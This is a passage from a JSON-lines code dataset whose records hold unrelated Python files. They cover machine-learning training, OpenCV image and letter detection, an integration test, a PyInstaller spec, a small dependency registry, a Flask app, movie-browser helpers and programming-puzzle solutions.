RandomizedSearchCV(rf(), parameters, n_iter=50, scoring='f1', n_jobs=10)\n clf = clf.fit(self.train_data, self.train_labels)\n #print('Best parameters:\\n', clf.best_params_)\n\n train_time = time.time() - start_time\n #print('Train time:', train_time, '(s)')\n\n\n test_start_time = time.time()\n probs = list(clf.predict_proba(self.test_data))\n fault_probs = [prob[1] for prob in probs]\n\n test_time = time.time() - test_start_time\n\n evaluation_dict = {'Time': [train_time],'test_Time': [test_time]}\n prob_dict = {'Prob': fault_probs, 'Label': self.test_labels, 'BestPara': clf.best_params_}\n\n return evaluation_dict, prob_dict\n\n","sub_path":"RQ2/DP/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"28782604","text":"#!/usr/bin/env python\n'''\n@author Luke Campbell \n@date Tue Oct 16 09:14:37 EDT 2012\n@file ion/services/dm/utility/test/test_granule.py\n@brief Tests for granule\n'''\n\nfrom pyon.ion.stream import StandaloneStreamPublisher, StandaloneStreamSubscriber\nfrom pyon.util.int_test import IonIntegrationTestCase\n\nfrom ion.services.dm.inventory.dataset_management_service import DatasetManagementService\nfrom ion.services.dm.utility.granule import RecordDictionaryTool\n\nfrom interface.services.dm.ipubsub_management_service import PubsubManagementServiceClient\nfrom interface.services.dm.idataset_management_service import DatasetManagementServiceClient\n\nfrom gevent.event import Event\nfrom nose.plugins.attrib import attr\n\nimport numpy as np\n\n@attr('INT',group='dm')\nclass RecordDictionaryIntegrationTest(IonIntegrationTestCase):\n xps = []\n xns = []\n def setUp(self):\n self._start_container()\n self.container.start_rel_from_url('res/deploy/r2deploy.yml')\n self.dataset_management = DatasetManagementServiceClient()\n self.pubsub_management = PubsubManagementServiceClient()\n\n self.rdt = None\n self.data_producer_id = None\n self.provider_metadata_update = None\n self.event = Event()\n\n def tearDown(self):\n for xn in self.xns:\n xni = self.container.ex_manager.create_xn_queue(xn)\n xni.delete()\n for xp in self.xps:\n xpi = self.container.ex_manager.create_xp(xp)\n xpi.delete()\n\n def verify_incoming(self, m,r,s):\n rdt = RecordDictionaryTool.load_from_granule(m)\n self.assertEquals(rdt, self.rdt)\n self.assertEquals(m.data_producer_id, self.data_producer_id)\n self.assertEquals(m.provider_metadata_update, self.provider_metadata_update)\n self.assertNotEqual(m.creation_timestamp, None)\n self.event.set()\n\n\n def test_granule(self):\n \n pdict_id = self.dataset_management.read_parameter_dictionary_by_name('ctd_parsed_param_dict', id_only=True)\n stream_def_id = self.pubsub_management.create_stream_definition('ctd', parameter_dictionary_id=pdict_id)\n pdict = DatasetManagementService.get_parameter_dictionary_by_name('ctd_parsed_param_dict')\n self.addCleanup(self.pubsub_management.delete_stream_definition,stream_def_id)\n\n stream_id, route = self.pubsub_management.create_stream('ctd_stream', 'xp1', stream_definition_id=stream_def_id)\n self.addCleanup(self.pubsub_management.delete_stream,stream_id)\n self.xps.append('xp1')\n publisher = StandaloneStreamPublisher(stream_id, route)\n\n subscriber = StandaloneStreamSubscriber('sub', self.verify_incoming)\n subscriber.start()\n\n subscription_id = self.pubsub_management.create_subscription('sub', stream_ids=[stream_id])\n self.xns.append('sub')\n self.pubsub_management.activate_subscription(subscription_id)\n\n\n rdt = RecordDictionaryTool(stream_definition_id=stream_def_id)\n rdt['time'] = np.arange(10)\n rdt['temp'] = np.random.randn(10) * 10 + 30\n rdt['pressure'] = [20] * 10\n\n self.assertEquals(set(pdict.keys()), set(rdt.fields))\n self.assertEquals(pdict.temporal_parameter_name, rdt.temporal_parameter)\n\n self.rdt = rdt\n self.data_producer_id = 'data_producer'\n self.provider_metadata_update = {1:1}\n\n publisher.publish(rdt.to_granule(data_producer_id='data_producer', provider_metadata_update={1:1}))\n\n self.assertTrue(self.event.wait(10))\n \n self.pubsub_management.deactivate_subscription(subscription_id)\n self.pubsub_management.delete_subscription(subscription_id)\n \n filtered_stream_def_id = self.pubsub_management.create_stream_definition('filtered', parameter_dictionary_id=pdict_id, available_fields=['time', 'temp'])\n self.addCleanup(self.pubsub_management.delete_stream_definition, filtered_stream_def_id)\n rdt = RecordDictionaryTool(stream_definition_id=filtered_stream_def_id)\n self.assertEquals(rdt._available_fields,['time','temp'])\n rdt['time'] = np.arange(20)\n rdt['temp'] = np.arange(20)\n with self.assertRaises(KeyError):\n rdt['pressure'] = np.arange(20)\n\n granule = rdt.to_granule()\n rdt2 = RecordDictionaryTool.load_from_granule(granule)\n self.assertEquals(rdt._available_fields, rdt2._available_fields)\n self.assertEquals(rdt.fields, rdt2.fields)\n for k,v in rdt.iteritems():\n self.assertTrue(np.array_equal(rdt[k], rdt2[k]))\n \n rdt = RecordDictionaryTool(stream_definition_id=stream_def_id)\n rdt['time'] = np.array([None,None,None])\n self.assertTrue(rdt['time'] is None)\n \n rdt['time'] = np.array([None, 1, 2])\n self.assertEquals(rdt['time'][0], rdt.fill_value('time'))\n\n\n\n\n\n \n","sub_path":"ion/services/dm/utility/test/test_granule.py","file_name":"test_granule.py","file_ext":"py","file_size_in_byte":4946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"416018849","text":"import os\nimport pickle\nimport time\nfrom utils import *\nimport argparse\n\n\ndef result_gen(write_path, folder, model_dir):\n with open(write_path, 'w') as f:\n f.write('Folder name')\n f.write('\\t')\n f.write('Prediction')\n f.write('\\t')\n f.write('Prob')\n f.write('\\t')\n f.write('Runtime')\n f.write('\\n')\n\n for brand in os.listdir(folder):\n ## open screenshot\n shot_path = folder + '/' + brand + '/shot.png'\n\n ## generate sliding windows\n start_time = time.time()\n\n pred = ''\n max_prob = 0\n for target in os.listdir(model_dir):\n with open(model_dir + '/' + target + '/svm_model.pkl', 'rb') as handle:\n model = pickle.load(handle)\n sc, pick, img = pred_logosense(model=model,\n shot_path=shot_path)\n if len(sc):\n if max(sc) >= max_prob:\n max_prob = max(sc)\n pred = target\n\n runtime = time.time() - start_time\n\n with open(write_path, 'a+') as f:\n f.write(folder + '/' + brand)\n f.write('\\t')\n f.write(pred)\n f.write('\\t')\n f.write(str(max_prob))\n f.write('\\t')\n f.write(str(runtime))\n f.write('\\n')\n\n print(\"-\"*20 + \"True brand: \" + brand.split('+')[0] + \"-\"*20)\n print(\"-\"*20 + \"Predicted brand: \" + pred + \"-\"*20)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', \"--output_path\", help='Where you save the result txt file',\n default= 'data/logosense_test.txt')\n\n parser.add_argument('-f', \"--folder\", help='Folder you want to test', required=True)\n\n parser.add_argument('-m', '--model_dir', help='Models for 5 brands', default='data/SVM_imageset')\n args = parser.parse_args()\n\n result_gen(args.output_path, args.folder, args.model_dir)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"102645646","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom sklearn.preprocessing import MinMaxScaler\nimport numpy as np\nimport mahotas\nimport cv2\nimport os\nimport h5py\n\n\n# In[2]:\n\n\ntest_path = \"test\"\n\n\n# bins for histogram\nbins = 30\n\n# 特徵描述符-1: Hu Moments\ndef fd_hu_moments(image):\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n feature = cv2.HuMoments(cv2.moments(image)).flatten()\n return feature\n\n# 特徵描述符-2: Haralick Texture\ndef fd_haralick(image):\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n haralick = mahotas.features.haralick(gray).mean(axis=0)\n return haralick\n\n# 特徵描述符-3: Color Histogram\ndef fd_histogram(image, mask=None):\n image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n hist = cv2.calcHist([image], [0, 1, 2], None, [bins, bins, bins], [0, 256, 0, 256, 0, 256])\n cv2.normalize(hist, hist)\n return hist.flatten()\n\nglob_features = []\n\n\n\nlist_of_files = os.listdir(test_path)\n\n \nfor imag_file in list_of_files:\n imag_file_path = os.path.join(test_path,imag_file)\n\n # 讀取影像\n image_ = cv2.imread(imag_file_path)\n if image_ is None:\n raise RuntimeError(\"No image\")\n \n # 特徵提取\n \n fv_hu_moments = fd_hu_moments(image_)\n fv_haralick = fd_haralick(image_)\n fv_histogram = fd_histogram(image_)\n\n \n # 串接功能+更新標籤和特徵向量列表\n \n glob_feature = np.hstack([fv_histogram, fv_haralick, fv_hu_moments])\n glob_features.append(glob_feature)\n\n\nprint(\".... completed Feature Extraction of test data...\")\n\n# 獲得整體特徵向量的大小\nprint(\".... feature vector size {}\".format(np.array(glob_features).shape))\n\n \n# 規範範圍(0-1)中的特徵向量\nscaler = MinMaxScaler(feature_range=(0, 1))\nrescaled_features_ = scaler.fit_transform(glob_features)\nprint(\".... feature vector normalized...\")\n\n# 使用HDF5保存特徵向量\nh5f_test_data = h5py.File('Output/test_data.h5', 'w')\nh5f_test_data.create_dataset('dataset_1', data=np.array(rescaled_features_))\n\nh5f_test_data.close()\n\nprint(\".... end of vectorisation of test data..\")\n\n","sub_path":"feature_test.py","file_name":"feature_test.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"560231944","text":"# -*- mode: python ; coding: utf-8 -*-\n\nblock_cipher = None\n\n\nimport time\nimport pkg_resources as pkgr\nfrom maestral import __version__, __author__\n\n\ntry:\n with open('bundle_version_macos.txt', 'r') as f:\n bundle_version = str(int(f.read()) + 1)\nexcept FileNotFoundError:\n bundle_version = 1\n\nwith open('bundle_version_macos.txt', 'w') as f:\n f.write(bundle_version)\n\n\ndef Entrypoint(dist, group, name, **kwargs):\n\n packages = []\n\n kwargs.setdefault('pathex', [])\n # get the entry point\n ep = pkgr.get_entry_info(dist, group, name)\n # insert path of the egg at the verify front of the search path\n kwargs['pathex'] = [ep.dist.location] + kwargs['pathex']\n # script name must not be a valid module name to avoid name clashes on import\n script_path = os.path.join(workpath, name + '-script.py')\n print(\"creating script for entry point\", dist, group, name)\n with open(script_path, 'w') as fh:\n print(\"import\", ep.module_name, file=fh)\n print(\"%s.%s()\" % (ep.module_name, '.'.join(ep.attrs)), file=fh)\n for package in packages:\n print(\"import\", package, file=fh)\n\n return Analysis(\n [script_path] + kwargs.get('scripts', []),\n **kwargs\n )\n\n\na = Entrypoint('maestral_qt', 'console_scripts', 'maestral_qt',\n binaries=[],\n datas= [\n (pkgr.resource_filename('maestral_qt', 'resources/tray-icons-svg/*.svg'), 'maestral_qt/resources/tray-icons-svg'),\n (pkgr.resource_filename('maestral_qt', 'resources/maestral.png'), 'maestral_qt/resources'),\n (pkgr.resource_filename('maestral_qt', 'resources/faceholder.png'), 'maestral_qt/resources'),\n (pkgr.resource_filename('maestral_qt', 'resources/*.ui'), 'maestral_qt/resources'),\n (pkgr.resource_filename('maestral', 'resources/*'), 'maestral/resources'),\n ],\n hiddenimports=['pkg_resources.py2_warn'],\n hookspath=['hooks'],\n runtime_hooks=[],\n excludes=['_tkinter'],\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher,\n noarchive=False)\npyz = PYZ(a.pure, a.zipped_data,\n cipher=block_cipher)\nexe = EXE(pyz,\n a.scripts,\n [],\n exclude_binaries=True,\n name='main',\n debug=False,\n bootloader_ignore_signals=False,\n strip=False,\n upx=True,\n console=False )\ncoll = COLLECT(exe,\n a.binaries,\n a.zipfiles,\n a.datas,\n strip=False,\n upx=True,\n upx_exclude=[],\n name='main')\napp = BUNDLE(coll,\n name='Maestral.app',\n icon=pkgr.resource_filename('maestral_qt', 'resources/maestral.icns'),\n bundle_identifier='com.samschott.maestral',\n info_plist={\n 'NSHighResolutionCapable': 'True',\n 'NSRequiresAquaSystemAppearance': 'False',\n 'LSUIElement': '1',\n 'CFBundleVersion': bundle_version,\n 'CFBundleShortVersionString': __version__,\n 'NSHumanReadableCopyright': 'Copyright © {} {}. All rights reserved.'.format(time.strftime('%Y'), __author__),\n 'LSMinimumSystemVersion': '10.13.0',\n },\n)\n","sub_path":"package/maestral_macos.spec","file_name":"maestral_macos.spec","file_ext":"spec","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"413191563","text":"import math\n\ndef ncr(n,r):\n f = math.factorial\n return f(n) / f(r) / f(n-r)\nif __name__ == '__main__':\n n = int(input())\n x = int(input())\n i = 0\n midPoint = (n)//2\n res = 0\n last = 0\n while i <= midPoint:\n last = int(ncr(n,i))\n res += last\n i += 1\n res *=2\n if n%2 == 0:\n res -= last\n res -= 1\n print(abs(res-x))","sub_path":"Contests/WalmartLabs Codesprint (Algorithms)/Hiking Selfies.py","file_name":"Hiking Selfies.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"464956484","text":"# Program to multiply two matrices using nested loops\n\n\n# 3x2 matrix\nX = [[2, 4], [4, 6], [6, 8]]\n# 2x3 matrix\nY = [[8, 6, 4], [6, 4, 8]]\n\n# resultant matrix\nresult = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]\n\nmy_list = []\n# iterating rows of X matrix\nfor i in range(len(X)):\n # iterating columns of Y matrix\n for j in range(len(Y[0])):\n # iterating rows of Y matrix\n for k in range(len(Y)):\n result[i][j] += X[i][k] * Y[k][j]\n\nfor r in result:\n print(r)","sub_path":"15.multiplymatrics.py","file_name":"15.multiplymatrics.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"614354512","text":"#!/usr/bin/python3\n\nimport pickle\nimport os\nimport sys\n#from pathlib import Path\n#import bz2\n\nHOME = \"C:/Users/Patrick/Documnents\"\nHELP_PAGE = \"error: help page could not be loaded, ensure that help.txt is present\"\n\ndeps = {}\nconfig = {}\nconfig[\"db\"] = \"default.pickle\"\n\ndef load_help_page():\n global HELP_PAGE\n fn = \"./help/help.txt\"\n if not os.path.isfile(fn):\n return\n\n fp = open(fn, \"r\")\n HELP_PAGE = fp.read()\n fp.close()\n\ndef correct(key):\n d = deps[key]\n d.include_path = d.include_path.replace(\"\\\\\", \"/\")\n d.debug_library_path = d.debug_library_path.replace(\"\\\\\", \"/\")\n d.release_library_path = d.release_library_path.replace(\"\\\\\", \"/\")\n\ndef init_config():\n fp = open(\"./config.pickle\", \"wb\")\n pickle.dump(config, fp)\n fp.close()\n\ndef load_config():\n global config\n db = \"./config.pickle\"\n if not os.path.isfile(db):\n init_config()\n\n fp = open(db, \"rb\")\n config = pickle.load(fp)\n fp.close()\n\nclass Dependency:\n def __init__(self):\n self.include_path = \"\"\n self.version = 1.0\n self.debug_library_path = \"\"\n self.release_library_path = \"\"\n self.release_libraries = []\n self.debug_libraries = []\n\ndef init_db():\n empty_dict = {}\n fp = open(config[\"db\"], \"wb\")\n pickle.dump(empty_dict, fp)\n fp.close()\n\ndef load_db():\n global deps\n db = config[\"db\"]\n\n if not os.path.isfile(db):\n print(\"creating new database\")\n init_db()\n\n fp = open(db, \"rb\")\n deps = pickle.load(fp)\n fp.close()\n\ndef remove_dependency(name):\n if not name in deps.keys():\n print(\"error: dep doesn't exist\")\n return\n\n deps.pop(name, None)\n\ndef register_new_dependency(name, inc_p, d_lib_p, r_lib_p, d_libs, r_libs):\n if name in deps:\n print(\"error, dep already exists\")\n return\n\n d = Dependency()\n d.include_path = inc_p\n d.debug_library_path = d_lib_p\n d.release_library_path = r_lib_p\n d.debug_libraries = d_libs.split(';')[:]\n d.release_libraries = r_libs.split(';')[:]\n\n deps[name] = d\n\ndef find_dependency(name):\n if not name in deps.keys():\n sys.stdout.write(\"error: dep does not exist\")\n return\n\n return deps[name]\n\ndef push():\n fp = open(config[\"db\"], \"wb\")\n pickle.dump(deps, fp)\n fp.close()\n\ndef push_config():\n fp = open(\"./config.pickle\", \"wb\")\n pickle.dump(config, fp)\n fp.close()\n\ndef main(argc, argv):\n load_help_page()\n load_config()\n load_db()\n\n if argc < 2:\n print(\"usage: fd.py \\ntype fd.py help for a list of commands\")\n return\n\n command = argv[1]\n\n if command == \"help\":\n print(HELP_PAGE)\n\n elif command == \"config\":\n if argc < 4:\n print(\"usage: config \")\n return\n\n subcmd = argv[2]\n value = argv[3]\n\n if subcmd == \"setcurrentdb\":\n config[\"db\"] = value\n push_config()\n return\n\n elif command == \"correct\":\n name = input(\"dep to correct: \")\n correct(name)\n print(\"corrected\")\n push()\n return\n\n elif command == \"register\":\n name = input(\"enter dependency name: \")\n #version = input(\"enter version: \")\n inc_p = input(\"enter include path: \")\n d_lib_p = input(\"enter debug library path: \")\n r_lib_p = input(\"enter release library path: \")\n d_libs = input(\"enter debug libraries: \")\n r_libs = input(\"enter release libraries: \")\n\n register_new_dependency(name, inc_p, d_lib_p, r_lib_p, d_libs, r_libs)\n\n push()\n\n elif command == \"dump\":\n print(deps)\n\n elif command == \"list\":\n for key in deps.keys():\n print(key)\n\n elif command == \"remove\":\n if argc < 3:\n sys.stdout.write(\"usage: remove \")\n return\n\n name = argv[2]\n remove_dependency(name)\n push()\n\n elif command == \"get\":\n if argc < 5:\n print(\"usage: get \")\n return\n\n name = argv[2]\n field = argv[3]\n mode = argv[4]\n\n if not name in deps:\n print(\"error: dependency does not exist\")\n return\n\n if field == \"I\":\n out = deps[name].include_path\n sys.stdout.write(out)\n return out\n\n elif field == \"L\":\n if mode == \"debug\":\n out = deps[name].debug_library_path\n sys.stdout.write(out)\n return out\n elif mode == \"release\":\n out = deps[name].release_library_path\n sys.stdout.write(out)\n return out\n else:\n print(\"error: unknown mode\")\n return\n\n elif field == \"l\":\n out = \"\"\n if mode == \"debug\":\n for lib in deps[name].debug_libraries:\n out += lib + ';'\n sys.stdout.write(out)\n return out\n elif mode == \"release\":\n for lib in deps[name].release_libraries:\n out += lib + ';'\n sys.stdout.write(out)\n return out\n else:\n print(\"error: unknown mode\")\n return\n\n else:\n print(\"error: unknown field\")\n return\n\n\nif __name__ == \"__main__\":\n main(len(sys.argv), sys.argv)\n sys.stdout.flush()\n","sub_path":"fd.py","file_name":"fd.py","file_ext":"py","file_size_in_byte":5454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"230521248","text":"from flask import Flask, jsonify, render_template, url_for\napp = Flask(__name__) \n\n@app.route('/') \ndef hello():\n\tresults = {} \n\treturn render_template('index.html', results=results)\n\n\n@app.route('/test/') \ndef test():\n\treturn 'Success'\n\t\nif __name__ == '__main__': \n\tapp.run()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"219199254","text":"import numpy as np\r\nimport cv2\r\nfrom matplotlib import pyplot as plt\r\nfrom utils.descriptor import Descriptor\r\nfrom utils.matcher import Matcher\r\nfrom utils.detectletters import DetectLetters\r\nfrom utils.webcam import Webcam\r\nfrom utils.stabilization import Stabilization\r\nimport math, sys\r\nimport difflib\r\n\r\nMIN_MATCH_COUNT = 10\r\nSKIP_FRAMES = 2\r\nWIDTH = 480\r\n\r\nWords = [\"CACHORRO\",\"CAVALO\",\"ELEFANTE\",\"GATO\",\"TIGRE\",\"VACA\"]\r\n\r\ndef resize(image, width = None, height = None, inter = cv2.INTER_AREA):\r\n\t# initialize the dimensions of the image to be resized and\r\n\t# grab the image size\r\n\tdim = None\r\n\t(h, w) = image.shape[:2]\r\n\r\n\t# if both the width and height are None, then return the\r\n\t# original image\r\n\tif width is None and height is None:\r\n\t\treturn image\r\n\r\n\t# check to see if the width is None\r\n\tif width is None:\r\n\t\t# calculate the ratio of the height and construct the\r\n\t\t# dimensions\r\n\t\tr = height / float(h)\r\n\t\tdim = (int(w * r), height)\r\n\r\n\t# otherwise, the height is None\r\n\telse:\r\n\t\t# calculate the ratio of the width and construct the\r\n\t\t# dimensions\r\n\t\tr = width / float(w)\r\n\t\tdim = (width, int(h * r))\r\n\r\n\t# resize the image\r\n\tresized = cv2.resize(image, dim, interpolation = inter)\r\n\r\n\t# return the resized image\r\n\treturn resized\r\n\r\n\r\n\t\r\ndef lineDist(lines, dist):\r\n\tif np.size(lines) > 4:\r\n\t\ty = lines[:,0,1]\r\n\t\tlines = lines[np.argsort(y)]\r\n\t\t\r\n\t\tlinesFinal = []\r\n\t\tlinesFinal.append(lines[0])\r\n\t\t \r\n\t\tdiff = abs(lines[1:,0,1] - lines[:-1,0,1])\r\n\r\n\t\tfor i in range(len(diff)):\r\n\t\t\tif diff[i] > dist:\r\n\t\t\t\tlinesFinal.append(lines[i+1])\r\n\telse:\r\n\t\treturn lines, -1\r\n\r\n\treturn np.array(linesFinal), 0\r\n\r\n\t# lines = cv2.HoughLinesP(edges,1,np.pi/180,275, minLineLength = 600, maxLineGap = 100)[0].tolist()\r\n\t# for x1,y1,x2,y2 in lines:\r\n\t\t# for index, (x3,y3,x4,y4) in enumerate(lines):\r\n\r\n\t\t\t# if y1==y2 and y3==y4: # Horizontal Lines\r\n\t\t\t\t# diff = abs(y1-y3)\r\n\t\t\t# elif x1==x2 and x3==x4: # Vertical Lines\r\n\t\t\t\t# diff = abs(x1-x3)\r\n\t\t\t# else:\r\n\t\t\t\t# diff = 0\r\n\r\n\t\t\t# if diff < 10 and diff is not 0:\r\n\t\t\t\t# del lines[index]\r\n\r\n\t# gridsize = (len(lines) - 2) / 2\r\n\t\r\n\t\r\ndef lineDetect(gray):\r\n\r\n\tblurred = cv2.GaussianBlur(gray, (5, 5), 0)\r\n\tthresh = cv2.adaptiveThreshold(blurred,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C , cv2.THRESH_BINARY_INV,15,2) #45\r\n\t#ret3,thresh = cv2.threshold(blurred,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\r\n\t#thresh = cv2.bitwise_not(thresh)\r\n\t\r\n\tedges = cv2.Canny(thresh,30,150,apertureSize = 5)\r\n\tminLineLength= 30#gray.shape[1]-50\r\n\t\r\n\tlines = cv2.HoughLinesP(image=edges,rho=0.1,theta=np.pi/180, threshold=5,lines=np.array([]), minLineLength=minLineLength,maxLineGap=10)\r\n\tlines, res = lineDist(lines,10)\r\n\t\r\n\timageO = cv2.cvtColor(gray, cv2.COLOR_GRAY2BGR)\r\n\t\r\n\tif res != -1:\r\n\t\ta,b,c = lines.shape\r\n\t\tfor i in range(a):\r\n\t\t\tprint(lines[i][0][0], lines[i][0][1])\r\n\t\t\tcv2.line(imageO, (lines[i][0][0], lines[i][0][1]), (lines[i][0][2], lines[i][0][3]), (0,0,255), 2, cv2.LINE_AA)\r\n\r\n\treturn imageO\r\n\r\n\r\n\t\r\n\t\r\nif __name__ == '__main__':\r\n\r\n\t# trainImage\r\n\timg1 = cv2.imread('images/Olha-Como-se-Escreve-lamina.jpg',0)\r\n\timg1 = resize(img1, width = WIDTH)\r\n\tcv2.imshow(\"Original Card\",img1)\r\n\t\t\r\n\tdescriptor = Descriptor(useSIFT = False)\r\n\t(refKps, refDescs) = descriptor.describe(img1)\r\n\t\r\n\tmatcher = Matcher(descriptor, ratio = 0.7, minMatches = MIN_MATCH_COUNT, distanceMethod = \"FlannBased\", useHamming = 1)\r\n\t\r\n\tletters = DetectLetters('letters_svm2.dat')\r\n\t\r\n\t# initialise webcam\r\n\tvideo = Webcam(1)\r\n\tif (video.cameraIsOpened() is False):\r\n\t\tprint ( \"Unable to connect to camera\" )\r\n\t\tsys.exit()\r\n\t\t\r\n\tvideo.start()\r\n\t\r\n\tOFrame = video.get_current_frame()\r\n\timGrayPrev = cv2.cvtColor(OFrame, cv2.COLOR_BGR2GRAY)\r\n\timGrayPrev = resize(imGrayPrev, width = WIDTH)\r\n\t\r\n\t#stabilization = Stabilization()\r\n\t\r\n\t#stabilization.setImagePrev(imGrayPrev)\r\n\t\t\r\n\tfps = 30.0\r\n\t\r\n\tcv2.namedWindow(\"Main Frame\", cv2.WINDOW_AUTOSIZE)\r\n\tcv2.namedWindow(\"Corrected Perspective\", cv2.WINDOW_AUTOSIZE)\r\n\t\r\n\tt = cv2.getTickCount()\r\n\tcount = 0\r\n\tisFirstFrame = True\r\n\t\r\n\twhile True:\r\n\t\tif count==0:\r\n\t\t\tt = cv2.getTickCount()\r\n\t\t\t\r\n\t\t#ret, OriginalFrame = video.read()\r\n\t\tOriginalFrame = video.get_current_frame()\r\n\t\timage = cv2.cvtColor(OriginalFrame, cv2.COLOR_BGR2GRAY)\r\n\t\timg2 = resize(image, width = WIDTH)\t\r\n\t\t\r\n\t\t#if ret:\r\n\t\t\r\n\t\tif (count % SKIP_FRAMES == 0):\r\n\r\n\t\t\t(Kps, Descs) = descriptor.describe(img2)\r\n\t\t\r\n\t\t\tif np.size(Kps) > 4:\r\n\r\n\t\t\t\t# find the keypoints and descriptors with BRISK\r\n\t\t\t\tptsA, ptsB = matcher.match(Kps, Descs, refKps, refDescs)\r\n\t\t\t\t\r\n\t\t\t\tif np.array(ptsA).size > 5 and np.array(ptsB).size > 5:\r\n\t\t\t\t\t#print(\"Antes Stab\")\r\n\t\t\t\t\t#print(ptsA.shape,ptsB.shape)\r\n\t\t\t\t\t\r\n\t\t\t\t\t#stabilization.procesStabilization(img2, isFirstFrame, ptsB.tolist())\r\n\t\t\t\t\t#ptsB = stabilization.getPointsNP()\r\n\t\t\t\t\t\r\n\t\t\t\t\t#if np.array(ptsB).size:\r\n\t\t\t\t\t#\tprint(\"Antes Homography\")\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t#\tK = min(ptsA.shape[0],ptsB.shape[0])\r\n\t\t\t\t\t\t\r\n\t\t\t\t\tM, score = matcher.calcHomography(ptsA, ptsB, inverseHomography = False)\r\n\t\t\t\t\t\r\n\t\t\t\t\tif np.size(M) == 9:\r\n\t\t\t\t\t\tif letters.isInProcess() == False:\r\n\t\t\t\t\t\t\tL,im_O = letters.detect(img2.copy(),M)\r\n\t\t\t\t\t\t\tcv2.imshow(\"Corrected Perspective\",im_O)\r\n\t\t\t\t\t\t\tW = difflib.get_close_matches(L, Words,1)\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tif W and (W[0] in Words):\r\n\t\t\t\t\t\t\t\tletters.setInProcess(True)\r\n\t\t\t\t\t\t\t\tprint(L,W[0])\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t# size = img2.shape\r\n\t\t\t\t\t\t# im_dst = cv2.warpPerspective(img2, M, (size[1],size[0]))\r\n\t\t\t\t\t\t# im_O2 = cv2.cvtColor(im_dst, cv2.COLOR_GRAY2BGR)\r\n\t\t\t\t\t\t# cv2.imshow(\"Homography\",im_O2)\r\n\t\t\t\telse:\r\n\t\t\t\t\tletters.setInProcess(False)\r\n\t\t\r\n\t\tisFirstFrame = False\r\n\t\t#stabilization.setImagePrev(img2)\r\n\t\t\r\n\t\tcv2.imshow(\"Main Frame\",OriginalFrame)\r\n\t\t\r\n\t\tk = cv2.waitKey(1) & 0xFF\r\n\t\tif k == 27:\r\n\t\t\tbreak\r\n\t\t# increment frame counter\r\n\t\tcount = count + 1\r\n\t\t# calculate fps at an interval of 100 frames\r\n\t\tif (count == 100):\r\n\t\t\tt = (cv2.getTickCount() - t)/cv2.getTickFrequency()\r\n\t\t\tfps = 100.0/t\r\n\t\t\tcount = 0\r\n\t\t\r\n\t\t\r\n\tvideo.stop_video()\r\n\tcv2.destroyAllWindows()\r\n","sub_path":"scripts/detectLetters-Card/detectLetters_video.py","file_name":"detectLetters_video.py","file_ext":"py","file_size_in_byte":5955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"595077091","text":"from typing import Iterable\nimport random\n\nfrom mbrowser.adapters.abstract_repository import AbstractRepository\nfrom mbrowser.domain.model import Movie\n\n\ndef get_director_full_names(repo: AbstractRepository):\n directors = repo.get_directors()\n director_full_names = [director.director_full_name for director in directors]\n\n return director_full_names\n\ndef get_actor_full_names(repo: AbstractRepository):\n actors = repo.get_actors()\n actor_full_names = [actor.actor_full_name for actor in actors]\n\n return actor_full_names\n\ndef get_genre_names(repo: AbstractRepository):\n genres = repo.get_genres()\n genre_names = [genre.genre_name for genre in genres]\n\n return genre_names\n\n\ndef get_random_movies(quantity, repo: AbstractRepository):\n movie_count = repo.get_number_of_movies()\n\n if quantity >= movie_count:\n # Reduce the quantity of ids to generate if the repository has an insufficient number of articles.\n quantity = movie_count - 1\n\n # Pick distinct and random articles.\n random_ids = random.sample(range(1, movie_count), quantity)\n movies = repo.get_movies_by_id(random_ids)\n\n return movies_to_dict(movies)\n\n\n# ============================================\n# Functions to convert dicts to model entities\n# ============================================\n\ndef movie_to_dict(movie: Movie):\n movie_dict = {\n 'movie_id': movie.id,\n 'title': movie.title,\n 'release_year': movie.release_year,\n 'director' : movie.director,\n # 'reviews' : movie.reviews,\n }\n return movie_dict\n\n\ndef movies_to_dict(movies: Iterable[Movie]):\n return [movie_to_dict(movie) for movie in movies]","sub_path":"mbrowser/utilities/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"79456347","text":"#!/usr/bin/env python\n\n\"\"\"\n\nIt is possible to show that the square root of two can be expressed as an infinite continued fraction.\n\nsqrt(2) = 1 + 1/(2 + 1/(2 + 1/(2 + ...)))\n\nBy expanding this for the first four iterations, we get:\n\n1 + 1/2 = 3/2 = 1.5\n1 + 1/(2 + 1/2) = 7/5 = 1.4\n1 + 1/(2 + 1/(2 + 